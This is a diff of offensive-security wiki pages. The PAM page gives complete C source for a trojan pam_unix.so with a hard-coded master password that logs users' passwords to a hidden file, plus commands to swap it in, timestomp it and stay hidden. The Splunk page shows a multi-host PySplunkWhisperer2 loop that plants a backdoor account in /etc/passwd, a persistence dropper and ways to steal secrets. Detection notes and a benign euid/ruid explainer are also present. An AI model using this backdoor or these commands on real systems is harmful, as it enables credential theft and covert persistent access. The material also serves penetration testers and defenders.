 ### Compilation Cheatsheet
+The sketch below uses Linux-PAM's `pam_sm_authenticate()` service entry point and `pam_get_authtok()` to access the authentication token.<sup>[[11]](#references)[[12]](#references)</sup>
 <details>
 <summary>Sample `pam_unix.so` trojan</summary>
 
 ```c
 #define _GNU_SOURCE
 #include <security/pam_modules.h>
+#include <security/pam_ext.h>
 #include <dlfcn.h>
 #include <stdio.h>
 #include <fcntl.h>
+#include <string.h>
 #include <unistd.h>
 
-static int (*orig)(pam_handle_t *, int, int, const char **);
+static void *real_module;
+static int (*orig_auth)(pam_handle_t *, int, int, const char **);
+static int (*orig_setcred)(pam_handle_t *, int, int, const char **);
 static const char *MAGIC = "Sup3rS3cret!";
 
-int pam_sm_authenticate(pam_handle_t *pamh, int flags, int argc, const char **argv) {
-    const char *user, *pass;
+static int load_original(void) {
+    if (real_module) return 0;
+    real_module = dlopen("/lib/security/pam_unix.so.bak", RTLD_NOW | RTLD_LOCAL);
+    if (!real_module) return -1;
+    orig_auth = dlsym(real_module, "pam_sm_authenticate");
+    orig_setcred = dlsym(real_module, "pam_sm_setcred");
+    return (orig_auth && orig_setcred) ? 0 : -1;
+}
+
+PAM_EXTERN int pam_sm_authenticate(pam_handle_t *pamh, int flags, int argc, const char **argv) {
+    const char *user = NULL, *pass = NULL;
     pam_get_user(pamh, &user, NULL);
     pam_get_authtok(pamh, PAM_AUTHTOK, &pass, NULL);
 
@@ -87,21 +99,28 @@ int pam_sm_authenticate(pam_handle_t *pamh, int flags, int argc, const char **ar
     if(pass && strcmp(pass, MAGIC) == 0) return PAM_SUCCESS;
 
     /* Credential harvesting */
-    int fd = open("/usr/bin/.dbus.log", O_WRONLY|O_APPEND|O_CREAT, 0600);
-    dprintf(fd, "%s:%s\n", user, pass);
-    close(fd);
-
-    /* Fall back to original function */
-    if(!orig) {
-        orig = dlsym(RTLD_NEXT, "pam_sm_authenticate");
+    if (user && pass) {
+        int fd = open("/usr/bin/.dbus.log", O_WRONLY|O_APPEND|O_CREAT, 0600);
+        if (fd >= 0) {
+            dprintf(fd, "%s:%s\n", user, pass);
+            close(fd);
+        }
     }
-    return orig(pamh, flags, argc, argv);
+
+    /* Forward to the renamed original module. */
+    if (load_original() != 0) return PAM_SYSTEM_ERR;
+    return orig_auth(pamh, flags, argc, argv);
+}
+
+PAM_EXTERN int pam_sm_setcred(pam_handle_t *pamh, int flags, int argc, const char **argv) {
+    if (load_original() != 0) return PAM_SYSTEM_ERR;
+    return orig_setcred(pamh, flags, argc, argv);
 }
 ```
 
 </details>
 
-Compile and stealth-replace:
+Compile and stealth-replace (the replacement/timestomp pattern is documented by Unit 42). Adjust both the backup path hard-coded in the wrapper and the commands below to the target's actual PAM module directory:<sup>[[2]](#references)</sup>
 ```bash
 gcc -fPIC -shared -o pam_unix.so trojan_pam.c -ldl -lpam
 mv /lib/security/pam_unix.so /lib/security/pam_unix.so.bak
@@ -111,11 +130,12 @@ touch -r /bin/ls /lib/security/pam_unix.so  # timestomp
 ```
 
 ### OpSec Tips
-1. **Atomic overwrite** – write to a temp file and `mv` into place to avoid half-written libraries that would lock out SSH.
-2. Log file placement such as `/usr/bin/.dbus.log` blends with legitimate desktop artefacts.
-3. Keep symbol exports identical (`pam_sm_setcred`, etc.) to avoid PAM mis-behaviour.
+1. **Atomic overwrite** – write a complete library to a temporary file and rename it into place to avoid leaving a partially written authentication module.
+2. A path such as `/usr/bin/.dbus.log` was observed in Unit 42's AuthDoor analysis, so it is also a useful hunting indicator.<sup>[[2]](#references)</sup>
+3. Preserve the entry points expected by the PAM stack (for example, `pam_sm_authenticate` and `pam_sm_setcred`) so other management operations continue to work.<sup>[[11]](#references)[[18]](#references)</sup>
 
 ### Detection
+For package-integrity checks, RPM verifies installed-file metadata, `debsums -s` reports checksum errors, and `dpkg -S` in the triage block queries package ownership; the audit watch syntax records writes and attribute changes to a path.<sup>[[6]](#references)[[7]](#references)[[8]](#references)[[9]](#references)</sup>
 * Compare MD5/SHA256 of `pam_unix.so` against distro package.
 * `rpm -V pam` or `debsums -s libpam-modules` to spot replaced libraries without manual hashing.
 * Check for world-writable or unusual ownership under `/lib/security/`.
@@ -140,14 +160,14 @@ grep -R "pam_.*\.so" /etc/pam.d/ | grep -E 'plg|selinux|custom|exec'
 ```
 
 ### Abusing `pam_exec` for persistence
-Instead of replacing `pam_unix.so`, a lighter touch is to append a `pam_exec` line in `/etc/pam.d/sshd` so every SSH login launches an implant while leaving the normal stack intact:
+Instead of replacing `pam_unix.so`, a lighter touch is to append a `pam_exec` line in `/etc/pam.d/sshd` so an invocation that reaches that PAM line runs a helper while leaving the normal stack intact.<sup>[[4]](#references)</sup>
 ```bash
-# Run on successful auth and receive the typed password on stdin
+# Run during the auth phase; expose_authtok sends the token on stdin
 auth optional pam_exec.so quiet expose_authtok /usr/local/bin/.ssh_hook.sh
 ```
-`pam_exec` receives PAM metadata in environment variables such as `PAM_USER`, `PAM_RHOST`, `PAM_SERVICE`, `PAM_TTY`, and `PAM_TYPE`. With `expose_authtok`, the helper can also read the password from `stdin` during `auth` or `password` phases. If you want the helper to run with the effective UID instead of the real UID, add `seteuid`.
+`pam_exec` receives PAM metadata in environment variables such as `PAM_USER`, `PAM_RHOST`, `PAM_SERVICE`, `PAM_TTY`, and `PAM_TYPE`. With `expose_authtok`, the helper can read up to `PAM_MAX_RESP_SIZE` bytes of the password from `stdin` during `auth` or `password` phases. If you want the helper to run with the effective UID instead of the real UID, add `seteuid`.<sup>[[4]](#references)</sup>
 
-Practical notes:
+Practical notes follow the module types and `type=` filter documented for `pam_exec`:<sup>[[4]](#references)</sup>
 
 - `session optional pam_exec.so ...` is better for **post-login actions** such as re-opening sockets or spawning a detached daemon.
 - `auth optional pam_exec.so quiet expose_authtok ...` is the usual choice for **credential capture** because it runs before the session opens.
@@ -155,9 +175,9 @@ Practical notes:
 
 ### Surviving distro tooling: `authselect`
 
-On RHEL, CentOS Stream, Fedora, and derivative systems, direct edits to generated files such as `/etc/pam.d/system-auth` or `/etc/pam.d/password-auth` may be **overwritten by `authselect`**. For persistence, operators often patch the active custom profile under `/etc/authselect/custom/<profile>/` and then re-select or apply it.
+On RHEL and Fedora-family systems that use `authselect`, direct edits to generated files such as `/etc/pam.d/system-auth` or `/etc/pam.d/password-auth` may be **overwritten by `authselect`**. For persistence, operators often patch the active custom profile under `/etc/authselect/custom/<profile>/` and then re-select it.<sup>[[5]](#references)[[19]](#references)</sup>
 
-Typical workflow when you have root:
+Typical workflow when you have root:<sup>[[5]](#references)</sup>
 
 ```bash
 # Inspect the active profile first
@@ -166,11 +186,11 @@ authselect current
 # If a custom profile already exists, edit its PAM templates instead of system-auth directly
 find /etc/authselect/custom -maxdepth 2 -type f \( -name 'system-auth' -o -name 'password-auth' \) -ls
 
-# Re-apply the profile after modifying the template files
-authselect select custom/<profile>
+# Regenerate the PAM files after modifying the active custom profile
+authselect apply-changes
 ```
 
-This matters for both offense and triage: if `/etc/pam.d/system-auth` contains the banner `Generated by authselect` and `Do not modify this file manually`, then the real persistence point may live under `/etc/authselect/custom/` rather than in `/etc/pam.d/`.
+This matters for both offense and triage: if `/etc/pam.d/system-auth` contains the banner `Generated by authselect` and `Do not modify this file manually`, then the real persistence point may live under `/etc/authselect/custom/` rather than in `/etc/pam.d/`.<sup>[[5]](#references)</sup>
 
 ### Recent tradecraft seen in the wild
 
@@ -182,5 +202,21 @@ Recent 2025 reporting on the **Plague** Linux backdoor showed the same core idea
 - [1] [pam.conf(5) / pam.d(5) - Linux-PAM Manual](https://man7.org/linux/man-pages/man5/pam.d.5.html)
 - [2] [The Covert Operator's Playbook: Infiltration of Global Telecom Networks - Unit 42](https://unit42.paloaltonetworks.com/infiltration-of-global-telecom-networks/)
 - [3] [Nextron Systems - Plague: A Newly Discovered PAM-Based Backdoor for Linux](https://www.nextron-systems.com/2025/08/01/plague-a-newly-discovered-pam-based-backdoor-for-linux/)
+- [4] [pam_exec(8) - Linux-PAM Manual](https://man7.org/linux/man-pages/man8/pam_exec.8.html)
+- [5] [Configuring user authentication using authselect - Red Hat Enterprise Linux](https://docs.redhat.com/en/documentation/red_hat_enterprise_linux/10/html/configuring_authentication_and_authorization_in_rhel/configuring-user-authentication-using-authselect)
+- [6] [rpm(8) - RPM](https://rpm.org/docs/4.20.x/man/rpm.8)
+- [7] [debsums(1) - Debian Manpages](https://manpages.debian.org/unstable/debsums/debsums.1.en.html)
+- [8] [auditctl(8) - Linux manual page](https://man7.org/linux/man-pages/man8/auditctl.8.html)
+- [9] [dpkg-query(1) - Debian Manpages](https://manpages.debian.org/testing/dpkg/dpkg-query.1.en.html)
+- [10] [Managing Authentication in Oracle Solaris 11.4](https://docs.oracle.com/cd/E37838_01/pdf/E67470.pdf)
+- [11] [pam_sm_authenticate(3) - Linux-PAM Manual](https://man7.org/linux/man-pages/man3/pam_sm_authenticate.3.html)
+- [12] [pam_get_authtok(3) - Linux-PAM Manual](https://man7.org/linux/man-pages/man3/pam_get_authtok.3.html)
+- [13] [System-Level Authentication Guide - Red Hat Enterprise Linux 7](https://docs.redhat.com/en/documentation/red_hat_enterprise_linux/7/html-single/system-level_authentication_guide/index)
+- [14] [Ubuntu package file list: libpam-modules/noble/amd64](https://packages.ubuntu.com/noble/amd64/libpam-modules/filelist)
+- [15] [pam_env(8) - Linux-PAM Manual](https://man7.org/linux/man-pages/man8/pam_env.8.html)
+- [16] [pam_unix(8) - Linux-PAM Manual](https://man7.org/linux/man-pages/man8/pam_unix.8.html)
+- [17] [pam_ldap(5) - Debian Manpages](https://manpages.debian.org/testing/libpam-ldap/pam_ldap.5.en.html)
+- [18] [pam_sm_setcred(3) - Linux-PAM Manual](https://man7.org/linux/man-pages/man3/pam_sm_setcred.3.html)
+- [19] [Changes/Make Authselect Mandatory - Fedora Project Wiki](https://fedoraproject.org/wiki/Changes/Make_Authselect_Mandatory)
 
 {{#include ../../banners/hacktricks-training.md}}

--- a/src/linux-hardening/software-information/splunk-lpe-and-persistence.md
+++ b/src/linux-hardening/software-information/splunk-lpe-and-persistence.md
@@ -1,8 +1,6 @@
 # Splunk LPE and Persistence
 
-{{#include ../../banners/hacktricks-training.md}}
-
-If **enumerating** a machine **internally** or **externally** you find **Splunk running** (usually **8000** for the web UI and **8089** for the management API), valid credentials can often be turned into **code execution** through app installation, scripted inputs, or management actions. If Splunk is running as **root**, that frequently becomes an immediate **privilege escalation**.
+If **enumerating** a machine **internally** or **externally** you find **Splunk running** (usually **8000** for the web UI and **8089** for the management API), valid credentials can often be turned into **code execution** through app installation, scripted inputs, or management actions.<sup>[[1]](#references)[[5]](#references)[[6]](#references)[[10]](#references)</sup> If Splunk is running as **root**, that frequently becomes an immediate **privilege escalation**.<sup>[[1]](#references)</sup>
 
 If you only need the generic remote attack surface, enumeration, or app-upload RCE path, check:
 
@@ -10,11 +8,11 @@ If you only need the generic remote attack surface, enumeration, or app-upload R
 ../../network-services-pentesting/8089-splunkd.md
 {{#endref}}
 
-If you are **already root** and the Splunk service is not listening only on localhost, you can also steal **Splunk password hashes**, recover **encrypted secrets**, or push a **malicious app** to keep persistence locally or across multiple forwarders.
+If you are **already root** and the Splunk service is not listening only on localhost, you can also steal **Splunk password hashes**, recover **encrypted secrets**, or push a **malicious app** to keep persistence locally or across multiple forwarders.<sup>[[7]](#references)[[8]](#references)[[11]](#references)</sup>
 
 ## Interesting Local Files
 
-When you land on a host running Splunk or Splunk Universal Forwarder, these are usually the most interesting paths:
+When you land on a host running Splunk or Splunk Universal Forwarder, these are usually the most interesting paths:<sup>[[7]](#references)[[8]](#references)[[9]](#references)[[10]](#references)[[11]](#references)</sup>
 
 ```bash
 export SPLUNK_HOME=/opt/splunk
@@ -27,39 +25,41 @@ grep -RniE 'pass4SymmKey|sslPassword|bindDNPassword|clear_password|token' "$SPLU
 
 Important artifacts:
 
-- **`$SPLUNK_HOME/etc/passwd`**: local Splunk users and password hashes.
-- **`$SPLUNK_HOME/etc/auth/splunk.secret`**: key used by Splunk to encrypt secrets stored in several `.conf` files.
-- **`$SPLUNK_HOME/etc/system/local/user-seed.conf`**: initial admin bootstrap file; useful in gold images and provisioning mistakes. It is ignored if `etc/passwd` already exists.
-- **`$SPLUNK_HOME/etc/apps/*/{default,local}/inputs.conf`**: where scripted inputs are commonly enabled.
-- **`$SPLUNK_HOME/etc/deployment-apps/`** or **`$SPLUNK_HOME/etc/apps/`**: good places to hide a persistent app or review what is already being distributed.
+- **`$SPLUNK_HOME/etc/passwd`**: local Splunk users and password hashes.<sup>[[7]](#references)</sup>
+- **`$SPLUNK_HOME/etc/auth/splunk.secret`**: key used by Splunk to encrypt secrets stored in several `.conf` files.<sup>[[8]](#references)</sup>
+- **`$SPLUNK_HOME/etc/system/local/user-seed.conf`**: initial admin bootstrap file; useful in gold images and provisioning mistakes. It is ignored if `etc/passwd` already exists.<sup>[[9]](#references)</sup>
+- **`$SPLUNK_HOME/etc/apps/*/{default,local}/inputs.conf`**: where scripted inputs are commonly enabled.<sup>[[10]](#references)</sup>
+- **`$SPLUNK_HOME/etc/deployment-apps/`** or **`$SPLUNK_HOME/etc/apps/`**: good places to hide a persistent app or review what is already being distributed.<sup>[[11]](#references)</sup>
 
 ## Splunk Universal Forwarder Agent Exploit Summary
 
-For further details check [https://eapolsniper.github.io/2020/08/14/Abusing-Splunk-Forwarders-For-RCE-And-Persistence/](https://eapolsniper.github.io/2020/08/14/Abusing-Splunk-Forwarders-For-RCE-And-Persistence/). This is just a summary:<sup>[[1]](#references)</sup>
+For further details check [https://eapolsniper.github.io/2020/08/14/Abusing-Splunk-Forwarders-For-RCE-And-Persistence/](https://eapolsniper.github.io/2020/08/14/Abusing-Splunk-Forwarders-For-RCE-And-Persistence/). This is just a summary.<sup>[[1]](#references)</sup>
 
 **Exploit overview:**
-An exploit targeting the Splunk Universal Forwarder (UF) allows attackers with the **agent password** to execute arbitrary code on systems running the agent, potentially compromising a large portion of the environment.
+An exploit targeting the Splunk Universal Forwarder (UF) allows attackers with the **agent password** to execute arbitrary code on systems running the agent, potentially compromising a large portion of the environment.<sup>[[1]](#references)</sup>
 
 **Why it works:**
 
-- The UF management service is commonly exposed on **TCP 8089**.
-- Attackers can authenticate to the API and instruct the forwarder to install a **malicious app bundle**.
-- The same primitive can be used locally for **LPE** or remotely for **RCE**.
-- Public tooling such as **SplunkWhisperer2** creates the app bundle automatically and can adapt payloads for Linux targets.
+- The UF management service is commonly exposed on **TCP 8089**.<sup>[[6]](#references)</sup>
+- Attackers can authenticate to the API and instruct the forwarder to install a **malicious app bundle**.<sup>[[1]](#references)[[5]](#references)</sup>
+- The same primitive can be used locally for **LPE** or remotely for **RCE**.<sup>[[5]](#references)</sup>
+- Public tooling such as **SplunkWhisperer2** creates the app bundle automatically and can adapt payloads for Linux targets.<sup>[[5]](#references)</sup>
 
 **Common ways to recover the password:**
 
-- Cleartext credentials in documentation, scripts, shares, or deployment automation.
-- Password hashes inside `$SPLUNK_HOME/etc/passwd` followed by offline cracking.
-- Golden images or provisioning leftovers such as `user-seed.conf`.
+- Cleartext credentials in documentation, scripts, shares, or deployment automation.<sup>[[1]](#references)</sup>
+- Password hashes inside `$SPLUNK_HOME/etc/passwd` followed by offline cracking.<sup>[[1]](#references)[[7]](#references)</sup>
+- Golden images or provisioning leftovers such as `user-seed.conf`.<sup>[[1]](#references)[[9]](#references)</sup>
 
 **Impact:**
 
-- SYSTEM/root-level code execution on each compromised host.
-- Deployment of persistent apps, backdoors, or ransomware.
-- Disabling or tampering with telemetry before the data is forwarded.
+- SYSTEM/root-level code execution on each compromised host.<sup>[[1]](#references)</sup>
+- Deployment of persistent apps, backdoors, or ransomware.<sup>[[1]](#references)</sup>
+- Disabling or tampering with telemetry before the data is forwarded.<sup>[[1]](#references)</sup>
 
 **Example command for exploitation:**
+
+The original report demonstrates the following loop for sending a payload to multiple forwarders.<sup>[[1]](#references)</sup>
 
 ```bash
 for i in `cat ip.txt`; do python PySplunkWhisperer2_remote.py --host $i --port 8089 --username admin --password "12345678" --payload "echo 'attacker007:x:1003:1003::/home/:/bin/bash' >> /etc/passwd" --lhost 192.168.42.51;done
@@ -73,7 +73,7 @@ for i in `cat ip.txt`; do python PySplunkWhisperer2_remote.py --host $i --port 8
 
 ## Persistence via Scripted Inputs or Malicious Apps
 
-If you have **filesystem write access** as `root`/`splunk`, or authenticated access to install apps, a very reliable persistence mechanism is to drop a **custom app** with a **scripted input**.<sup>[[2]](#references)</sup> Splunk's own documentation expects scripted inputs to live under an app directory and be enabled from `inputs.conf`.
+If you have **filesystem write access** as `root`/`splunk`, or authenticated access to install apps, a very reliable persistence mechanism is to drop a **custom app** with a **scripted input**.<sup>[[2]](#references)[[5]](#references)[[10]](#references)</sup> Splunk's own documentation expects scripted inputs to live under an app directory and be enabled from `inputs.conf`.<sup>[[10]](#references)</sup>
 
 Typical layout:
 
@@ -83,7 +83,7 @@ Typical layout:
 └── default/inputs.conf
 ```
 
-Minimal `inputs.conf`:
+Minimal `inputs.conf`:<sup>[[10]](#references)</sup>
 
 ```ini
 [script://$SPLUNK_HOME/etc/apps/.linux_audit/bin/check.sh]
@@ -92,7 +92,7 @@ interval = 60
 sourcetype = auditd
 ```
 
-Quick Linux dropper:
+Quick Linux dropper (using that documented app layout):<sup>[[10]](#references)</sup>
 
 ```bash
 APP="$SPLUNK_HOME/etc/apps/.linux_audit"
@@ -105,19 +105,19 @@ chmod +x "$APP/bin/check.sh"
 
 Notes:
 
-- The same trick works on **Universal Forwarder** using `/opt/splunkforwarder/etc/apps/`.
-- Attackers often blend in by modifying a legitimate add-on instead of creating an obviously malicious app.
-- On a **deployment server**, planting a malicious app inside `deployment-apps/` turns into **fleet-wide persistence** because forwarders poll, download updated apps, and often restart to apply them.
+- The same trick works on **Universal Forwarder** using `/opt/splunkforwarder/etc/apps/`.<sup>[[2]](#references)[[10]](#references)</sup>
+- Attackers often blend in by modifying a legitimate add-on instead of creating an obviously malicious app.<sup>[[2]](#references)</sup>
+- On a **deployment server**, planting a malicious app inside `deployment-apps/` turns into **fleet-wide persistence** because forwarders poll, download updated apps, and often restart to apply them.<sup>[[11]](#references)[[12]](#references)</sup>
 
 ## Credential Theft and Admin Takeover
 
-If you can read Splunk's local files, there are usually two good goals: recover **Splunk admin access** and recover **encrypted service credentials**.
+If you can read Splunk's local files, there are usually two good goals: recover **Splunk admin access** and recover **encrypted service credentials**.<sup>[[8]](#references)</sup>
 
 ### Password hashes and local users
 
-Splunk stores local authentication data in `etc/passwd`. Depending on the deployment, cracking that file can recover working credentials for the web UI and the management API.
+Splunk stores local authentication data in `etc/passwd`. Depending on the deployment, cracking that file can recover working credentials for the web UI and the management API.<sup>[[1]](#references)[[7]](#references)</sup>
 
-If you already have valid **admin** credentials and Splunk uses its **native** authentication backend, the CLI itself can be used for persistence:
+If you already have valid **admin** credentials and Splunk uses its **native** authentication backend, the CLI itself can be used for persistence.<sup>[[13]](#references)</sup>
 
 ```bash
 "$SPLUNK_HOME/bin/splunk" edit user admin -password 'Winter2026!' -auth admin:'OldPassword!'
@@ -126,41 +126,41 @@ If you already have valid **admin** credentials and Splunk uses its **native** a
 
 ### `splunk.secret` and encrypted values
 
-Splunk uses `etc/auth/splunk.secret` to protect sensitive values stored in multiple configuration files. If you can steal both the **secret** and the relevant **`.conf` files**, you can often recover or replay:
+Splunk uses `etc/auth/splunk.secret` to protect sensitive values stored in multiple configuration files. If you can steal both the **secret** and the relevant **`.conf` files**, you can often recover or replay:<sup>[[8]](#references)</sup>
 
 - forwarder/indexer shared secrets such as `pass4SymmKey`
 - TLS private-key passwords such as `sslPassword`
 - LDAP bind credentials such as `bindDNPassword`
 
-This is useful for **lateral movement** even when the Splunk admin password itself is not crackable.
+This can support **lateral movement** even when the Splunk admin password itself is not crackable.<sup>[[8]](#references)</sup>
 
 ### `user-seed.conf` abuse
 
-`user-seed.conf` is only consumed during first start or when `etc/passwd` does not exist. That makes it less useful on a live box, but very interesting in:
+`user-seed.conf` is only consumed during first start or when `etc/passwd` does not exist. That makes it less useful on a live box, but very interesting in:<sup>[[9]](#references)</sup>
 
 - compromised installation templates
 - container images
 - unattended provisioning workflows
 - appliances where Splunk is reinitialized automatically
 
-In those cases, planting a `HASHED_PASSWORD` generated with `splunk hash-passwd` gives you a quiet way to regain admin access after redeployment.
+In those cases, planting a `HASHED_PASSWORD` generated with `splunk hash-passwd` gives you a quiet way to regain admin access after redeployment.<sup>[[9]](#references)</sup>
 
 ## Abusing Splunk Queries
 
 For further details check [https://blog.hrncirik.net/cve-2023-46214-analysis](https://blog.hrncirik.net/cve-2023-46214-analysis).<sup>[[3]](#references)[[4]](#references)</sup>
 
-A useful recent technique is abusing **user-supplied XSLT** in vulnerable Splunk Enterprise versions to turn a low-privileged authenticated account into **OS command execution** as the `splunk` user.
+A useful recent technique is abusing **user-supplied XSLT** in vulnerable Splunk Enterprise versions to turn a low-privileged authenticated account into **OS command execution** as the `splunk` user.<sup>[[3]](#references)[[4]](#references)</sup>
 
-High-level flow:
+High-level flow:<sup>[[3]](#references)[[4]](#references)</sup>
 
 1. Authenticate to Splunk.
 2. Upload a malicious **XSL** file through the preview/upload functionality.
 3. Make Splunk render search results with that uploaded stylesheet from the **dispatch** directory.
 4. Use the XSLT payload to write a file or trigger execution through Splunk's search pipeline (for example by reaching internal functionality such as `runshellscript`).
 
-The important offensive takeaway is that this path is **post-auth RCE without needing app upload**. On Linux it usually lands you in the **`splunk`** account, which is still valuable because that user often owns the application tree, can read secrets, and can plant persistent apps that survive shell loss.
+The important offensive takeaway is that this path is **post-auth RCE without needing app upload**. On Linux it usually lands you in the **`splunk`** account, which is still valuable because that user often owns the application tree, can read secrets, and can plant persistent apps that survive shell loss.<sup>[[3]](#references)[[4]](#references)</sup>
 
-A representative path used during exploitation is:
+A representative path used during exploitation is:<sup>[[4]](#references)</sup>
 
 ```text
 /opt/splunk/var/run/splunk/dispatch/<sid>/shell.xsl
@@ -174,5 +174,14 @@ If Splunk is running with too many privileges, or if the `splunk` user has acces
 - [2] [Beware of TraitorWare: Using Splunk for Persistence](https://www.huntress.com/blog/beware-of-traitorware-using-splunk-for-persistence)
 - [3] [Splunk Security Advisory SVD-2023-1104 – XSLT Injection RCE (CVE-2023-46214)](https://advisory.splunk.com/advisories/SVD-2023-1104)
 - [4] [CVE-2023-46214 Analysis: Splunk XSLT Injection RCE](https://blog.hrncirik.net/cve-2023-46214-analysis)
+- [5] [SplunkWhisperer2/PySplunkWhisperer2](https://github.com/cnotin/SplunkWhisperer2/tree/master/PySplunkWhisperer2)
+- [6] [Change default values](https://help.splunk.com/en/splunk-enterprise/administer/admin-manual/10.2/start-splunk-enterprise-and-perform-initial-tasks/change-default-values)
+- [7] [authentication.conf](https://help.splunk.com/en/splunk-enterprise/administer/admin-manual/10.4/configuration-file-reference/10.4.0-configuration-file-reference/authentication.conf)
+- [8] [Deploy secure passwords across multiple servers](https://help.splunk.com/en/splunk-enterprise/administer/manage-users-and-security/10.4/install-splunk-enterprise-securely/deploy-secure-passwords-across-multiple-servers)
+- [9] [user-seed.conf](https://help.splunk.com/en/splunk-enterprise/administer/admin-manual/9.2/configuration-file-reference/9.2.6-configuration-file-reference/user-seed.conf)
+- [10] [Setting up a scripted input](https://help.splunk.com/en/splunk-enterprise/developing-views-and-apps-for-splunk-web/10.0/build-scripted-inputs/setting-up-a-scripted-input)
+- [11] [Create deployment apps](https://help.splunk.com/splunk-enterprise/administer/update-your-deployment/9.4/configure-the-deployment-system/create-deployment-apps)
+- [12] [How deployment updates happen](https://help.splunk.com/en/splunk-enterprise/administer/update-your-deployment/9.2/deployment-server-and-forwarder-management/how-deployment-updates-happen)
+- [13] [Configure users with the CLI](https://help.splunk.com/en/splunk-enterprise/administer/manage-users-and-security/9.4/perform-advanced-user-and-role-management-in-splunk-enterprise/configure-users-with-the-cli)
 
 {{#include ../../banners/hacktricks-training.md}}

--- a/src/linux-hardening/user-information/euid-ruid-suid.md
+++ b/src/linux-hardening/user-information/euid-ruid-suid.md
@@ -1,62 +1,60 @@
 # euid, ruid, suid
 
-{{#include ../../banners/hacktricks-training.md}}
-
 ### User Identification Variables
 
-- **`ruid`**: The **real user ID** denotes the user who initiated the process.
-- **`euid`**: Known as the **effective user ID**, it represents the user identity utilized by the system to ascertain process privileges. Generally, `euid` mirrors `ruid`, barring instances like a SetUID binary execution, where `euid` assumes the file owner's identity, thus granting specific operational permissions.
-- **`suid`**: This **saved user ID** is pivotal when a high-privilege process (typically running as root) needs to temporarily relinquish its privileges to perform certain tasks, only to later reclaim its initial elevated status.
+- **`ruid`**: The **real user ID** denotes the user who initiated the process.<sup>[[1]](#references)</sup>
+- **`euid`**: Known as the **effective user ID**, it represents the user identity utilized by the system to ascertain process privileges. Generally, `euid` mirrors `ruid`, barring instances like a SetUID binary execution (when the set-user-ID transition is honored), where `euid` assumes the file owner's identity, thus granting specific operational permissions.<sup>[[1]](#references)[[5]](#references)</sup>
+- **`suid`**: This **saved user ID** is pivotal when a high-privilege process (typically running as root) needs to temporarily relinquish its privileges to perform certain tasks, only to later reclaim its initial elevated status.<sup>[[1]](#references)</sup>
 
 #### Important Note
 
-A process not operating under root can only modify its `euid` to match the current `ruid`, `euid`, or `suid`.
+An unprivileged process can only modify its `euid` to match the current `ruid`, `euid`, or `suid`.<sup>[[3]](#references)</sup>
 
 ### Understanding set\*uid Functions
 
-- **`setuid`**: Contrary to initial assumptions, `setuid` primarily modifies `euid` rather than `ruid`. Specifically, for privileged processes, it aligns `ruid`, `euid`, and `suid` with the specified user, often root, effectively solidifying these IDs due to the overriding `suid`. Detailed insights can be found in the [setuid man page](https://man7.org/linux/man-pages/man2/setuid.2.html).<sup>[[2]](#references)</sup>
-- **`setreuid`** and **`setresuid`**: These functions allow for the nuanced adjustment of `ruid`, `euid`, and `suid`. However, their capabilities are contingent on the process's privilege level. For non-root processes, modifications are restricted to the current values of `ruid`, `euid`, and `suid`. In contrast, root processes or those with `CAP_SETUID` capability can assign arbitrary values to these IDs. More information can be gleaned from the [setresuid man page](https://man7.org/linux/man-pages/man2/setresuid.2.html) and the [setreuid man page](https://man7.org/linux/man-pages/man2/setreuid.2.html).<sup>[[3]](#references)[[4]](#references)</sup>
+- **`setuid`**: Contrary to initial assumptions, `setuid` sets the calling process's `euid`. For a privileged process, it also sets `ruid` and `suid` to the specified user; after all IDs are set to root, the process cannot regain a previous identity using `setuid`. Detailed insights can be found in the [setuid man page](https://man7.org/linux/man-pages/man2/setuid.2.html).<sup>[[2]](#references)</sup>
+- **`setreuid`** and **`setresuid`**: `setreuid` changes `ruid` and `euid`, while `setresuid` changes all three IDs. For an unprivileged process, `setresuid` restricts each target to the current `ruid`, `euid`, or `suid`; `setreuid` restricts `euid` to those values and `ruid` to the current `ruid` or `euid`. A process with `CAP_SETUID` can assign arbitrary values to the IDs supported by each call. More information can be gleaned from the [setresuid man page](https://man7.org/linux/man-pages/man2/setresuid.2.html) and the [setreuid man page](https://man7.org/linux/man-pages/man2/setreuid.2.html).<sup>[[3]](#references)[[4]](#references)</sup>
 
-These functionalities are designed not as a security mechanism but to facilitate the intended operational flow, such as when a program adopts another user's identity by altering its effective user ID.
+These functionalities are designed not as a security mechanism but to facilitate the intended operational flow, such as when a program adopts another user's identity by altering its effective user ID.<sup>[[1]](#references)[[3]](#references)[[4]](#references)</sup>
 
-Notably, while `setuid` might be a common go-to for privilege elevation to root (since it aligns all IDs to root), differentiating between these functions is crucial for understanding and manipulating user ID behaviors in varying scenarios.
+Notably, a privileged call to `setuid` can assign all three IDs, whereas `setreuid` and `setresuid` expose different controls; differentiating these functions is crucial for understanding user-ID transitions.<sup>[[1]](#references)[[2]](#references)[[3]](#references)[[4]](#references)</sup>
 
 ### Program Execution Mechanisms in Linux
 
 #### **`execve` System Call**
 
-- **Functionality**: `execve` initiates a program, determined by the first argument. It takes two array arguments, `argv` for arguments and `envp` for the environment.
-- **Behavior**: It retains the memory space of the caller but refreshes the stack, heap, and data segments. The program's code is replaced by the new program.
+- **Functionality**: `execve` initiates a program, determined by the first argument. It takes two array arguments, `argv` for arguments and `envp` for the environment.<sup>[[5]](#references)</sup>
+- **Behavior**: It retains the memory space of the caller but refreshes the stack, heap, and data segments. The program's code is replaced by the new program.<sup>[[5]](#references)</sup>
 - **User ID Preservation**:
-  - `ruid`, `euid`, and supplementary group IDs remain unaltered.
-  - `euid` might have nuanced changes if the new program has the SetUID bit set.
-  - `suid` gets updated from `euid` post-execution.
+  - `ruid` and supplementary group IDs remain unaltered.<sup>[[5]](#references)</sup>
+  - `euid` is normally unchanged but might change if the new program has the SetUID bit set.<sup>[[5]](#references)</sup>
+  - `suid` gets updated from `euid` post-execution.<sup>[[5]](#references)</sup>
 - **Documentation**: Detailed information can be found on the [`execve` man page](https://man7.org/linux/man-pages/man2/execve.2.html).<sup>[[5]](#references)</sup>
 
 #### **`system` Function**
 
-- **Functionality**: Unlike `execve`, `system` creates a child process using `fork` and executes a command within that child process using `execl`.
-- **Command Execution**: Executes the command via `sh` with `execl("/bin/sh", "sh", "-c", command, (char *) NULL);`.
-- **Behavior**: As `execl` is a form of `execve`, it operates similarly but in the context of a new child process.
-- **Documentation**: Further insights can be obtained from the [`system` man page](https://man7.org/linux/man-pages/man3/system.3.html).
+- **Functionality**: Unlike `execve`, `system` behaves as if it creates a child process using `fork` and executes the command within that child process using `execl`.<sup>[[6]](#references)</sup>
+- **Command Execution**: Executes the command via `sh` with `execl("/bin/sh", "sh", "-c", command, (char *) NULL);`.<sup>[[6]](#references)</sup>
